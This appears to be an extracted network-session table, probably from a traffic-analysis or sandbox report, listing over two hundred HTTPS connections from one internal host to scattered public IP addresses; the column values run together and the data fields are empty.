                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15879192.168.2.144842081.81.72.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15880192.168.2.145506687.184.224.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15881192.168.2.144823083.53.1.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15882192.168.2.145759418.97.97.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15883192.168.2.1445504201.11.36.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15884192.168.2.1435148169.210.84.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15885192.168.2.143793881.6.14.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15886192.168.2.1442924177.65.51.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15887192.168.2.1432952180.169.171.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15888192.168.2.1440548212.70.156.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15889192.168.2.1459396108.175.67.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15890192.168.2.1456050166.184.131.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15891192.168.2.1444660113.90.19.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15892192.168.2.1444904200.118.194.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15893192.168.2.14426082.103.78.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15894192.168.2.145161652.45.56.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15895192.168.2.1439056158.229.90.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15896192.168.2.1450502177.217.65.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15897192.168.2.1441462102.120.137.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15898192.168.2.146092223.17.185.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15899192.168.2.1452606114.58.149.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15900192.168.2.1438820197.245.188.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15901192.168.2.144899475.73.148.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15902192.168.2.145059835.106.86.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15903192.168.2.1435248144.70.4.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15904192.168.2.1449822151.129.22.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15905192.168.2.144756635.36.165.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15906192.168.2.1443064140.127.191.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15907192.168.2.1453870137.173.68.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15908192.168.2.144271497.155.203.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15909192.168.2.1445764138.253.118.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15910192.168.2.1434942166.186.252.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15911192.168.2.143384436.195.23.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15912192.168.2.143339295.203.194.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15913192.168.2.1450154109.27.43.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15914192.168.2.1437834195.127.157.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15915192.168.2.144311434.60.233.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15916192.168.2.144560458.195.239.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15917192.168.2.1437584212.23.136.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15918192.168.2.1439156154.244.188.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15919192.168.2.144303436.213.186.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15920192.168.2.144194220.82.166.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15921192.168.2.145030699.163.58.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15922192.168.2.145327660.70.213.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15923192.168.2.1456048110.224.73.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15924192.168.2.145464257.118.68.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15925192.168.2.1441730184.8.48.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15926192.168.2.1455766110.252.206.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15927192.168.2.1441638135.16.155.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15928192.168.2.143696090.100.18.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15929192.168.2.144344484.30.106.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15930192.168.2.1456894123.120.240.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15931192.168.2.144211889.188.31.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15932192.168.2.1437938210.40.85.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15933192.168.2.143887879.242.153.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15934192.168.2.143874447.19.9.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15935192.168.2.143997887.234.98.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15936192.168.2.144320883.161.145.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15937192.168.2.143754214.235.50.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15938192.168.2.1450388158.237.85.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15939192.168.2.145583645.237.130.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15940192.168.2.14430125.61.92.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15941192.168.2.1443880187.227.124.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15942192.168.2.1451112166.219.125.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15943192.168.2.1451638133.172.146.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15944192.168.2.1457020220.100.30.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15945192.168.2.1448220105.169.57.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15946192.168.2.144477673.223.184.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15947192.168.2.1445680117.196.181.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15948192.168.2.1434658150.241.73.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15949192.168.2.14427009.147.211.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15950192.168.2.144733250.119.151.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15951192.168.2.145304687.66.242.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15952192.168.2.1437088156.92.182.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15953192.168.2.1448912202.149.90.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15954192.168.2.1448308193.85.221.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15955192.168.2.1453376213.76.236.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15956192.168.2.144661496.6.23.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15957192.168.2.1446702154.146.17.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15958192.168.2.1446930178.125.145.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15959192.168.2.1441962188.18.229.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15960192.168.2.1453312145.149.248.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15961192.168.2.143703272.44.248.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15962192.168.2.1460786168.166.136.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15963192.168.2.1446600116.41.237.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15964192.168.2.145960449.181.185.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15965192.168.2.144333623.183.70.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15966192.168.2.1433982219.141.38.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15967192.168.2.1458474107.189.221.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15968192.168.2.1445720113.76.233.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15969192.168.2.1446950103.45.71.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15970192.168.2.143783684.187.186.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15971192.168.2.14439829.125.85.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15972192.168.2.1436826129.195.162.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15973192.168.2.1457200198.31.100.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15974192.168.2.1437822153.17.118.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15975192.168.2.1433292141.36.75.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15976192.168.2.144814814.68.51.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15977192.168.2.1453634221.184.66.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15978192.168.2.1448024182.3.198.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15979192.168.2.145249270.186.22.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15980192.168.2.1460590173.253.204.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15981192.168.2.144544623.105.143.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15982192.168.2.144353260.38.21.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15983192.168.2.143307627.78.155.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15984192.168.2.145088241.38.75.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15985192.168.2.145321678.118.244.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15986192.168.2.1457830190.50.122.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15987192.168.2.1442682163.167.167.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15988192.168.2.143580243.43.112.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15989192.168.2.1455676223.252.176.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15990192.168.2.145887059.74.81.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15991192.168.2.1438772141.208.21.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15992192.168.2.145588014.76.233.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15993192.168.2.1454032174.213.219.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15994192.168.2.1440262195.87.198.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15995192.168.2.1446634196.2.57.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15996192.168.2.144070639.203.223.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15997192.168.2.1446402176.203.13.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15998192.168.2.1460076219.182.145.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15999192.168.2.1453064138.189.157.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16000192.168.2.143885427.192.161.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16001192.168.2.143745827.178.181.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16002192.168.2.1457410199.61.239.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16003192.168.2.1442612117.59.38.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16004192.168.2.1449838168.150.220.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16005192.168.2.1438492208.149.7.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16006192.168.2.1443642221.44.207.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16007192.168.2.143328079.132.176.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16008192.168.2.1444956121.64.184.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16009192.168.2.1448668155.200.232.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16010192.168.2.144169651.110.12.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16011192.168.2.1456882101.51.107.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16012192.168.2.144651294.30.28.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16013192.168.2.1438594185.208.40.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16014192.168.2.1438774209.254.176.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16015192.168.2.1442004102.231.85.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16016192.168.2.143763642.214.170.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16017192.168.2.1442134159.81.93.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16018192.168.2.1439702126.46.15.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16019192.168.2.145574288.194.52.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16020192.168.2.1444020153.209.52.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16021192.168.2.145567065.193.199.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16022192.168.2.1445568166.202.195.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16023192.168.2.144141476.127.104.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16024192.168.2.1456854159.237.13.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16025192.168.2.145424689.219.215.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16026192.168.2.1438668196.12.251.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16027192.168.2.1443224118.51.82.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16028192.168.2.1433230117.159.167.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16029192.168.2.1451672136.75.67.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16030192.168.2.1439078165.97.255.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16031192.168.2.1440750159.107.189.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16032192.168.2.144265478.219.27.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16033192.168.2.1450020124.234.51.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16034192.168.2.14434268.216.192.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16035192.168.2.1455166179.46.141.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16036192.168.2.1447470212.25.225.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16037192.168.2.1447220179.230.232.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16038192.168.2.1453284210.202.241.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16039192.168.2.145786637.113.39.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16040192.168.2.1433146121.77.111.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16041192.168.2.1459512206.130.12.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16042192.168.2.1439962212.95.3.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16043192.168.2.145706218.55.16.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16044192.168.2.145416846.218.176.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16045192.168.2.14500949.82.139.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16046192.168.2.1459482138.44.163.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16047192.168.2.144315040.9.130.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16048192.168.2.1445074155.177.231.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16049192.168.2.1436900141.167.148.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16050192.168.2.145743464.213.167.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16051192.168.2.144764076.1.114.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16052192.168.2.146090699.112.62.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16053192.168.2.1432882188.101.232.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16054192.168.2.1450544108.30.249.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16055192.168.2.1443126162.156.59.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16056192.168.2.143734835.61.167.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16057192.168.2.1457094111.180.57.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16058192.168.2.1451876134.86.92.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16059192.168.2.144630078.55.75.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16060192.168.2.1455388208.135.230.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16061192.168.2.145209657.174.210.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16062192.168.2.1453082164.128.20.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16063192.168.2.146086425.148.208.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16064192.168.2.1459416154.92.27.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16065192.168.2.1444998176.238.4.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16066192.168.2.145698893.107.239.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16067192.168.2.145824238.176.119.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16068192.168.2.1457964143.74.98.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16069192.168.2.144161223.43.54.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16070192.168.2.144448031.181.132.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16071192.168.2.1448896177.131.217.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16072192.168.2.1451436194.175.133.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16073192.168.2.143470032.141.112.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16074192.168.2.1433358145.162.148.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16075192.168.2.144153264.60.95.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16076192.168.2.1436502176.15.221.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16077192.168.2.1434840131.97.13.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16078192.168.2.1452006139.150.208.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16079192.168.2.1448526193.82.177.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16080192.168.2.143560860.116.201.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16081192.168.2.1457960190.190.132.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16082192.168.2.145830654.102.76.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16083192.168.2.145237437.185.241.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16084192.168.2.144052218.190.140.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16085192.168.2.144918499.131.95.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16086192.168.2.1460136150.27.246.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16087192.168.2.143936657.235.34.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16088192.168.2.143604668.73.169.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16089192.168.2.1457790124.137.16.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16090192.168.2.144235025.111.33.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16091192.168.2.1457932178.85.89.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16092192.168.2.143318837.100.248.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16093192.168.2.1448360205.154.161.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16094192.168.2.1438788121.227.227.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16095192.168.2.144882291.69.85.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16096192.168.2.145762280.187.176.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16097192.168.2.1445290108.121.241.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16098192.168.2.1457078205.222.211.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16099192.168.2.144440262.25.215.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16100192.168.2.145745261.16.171.3443
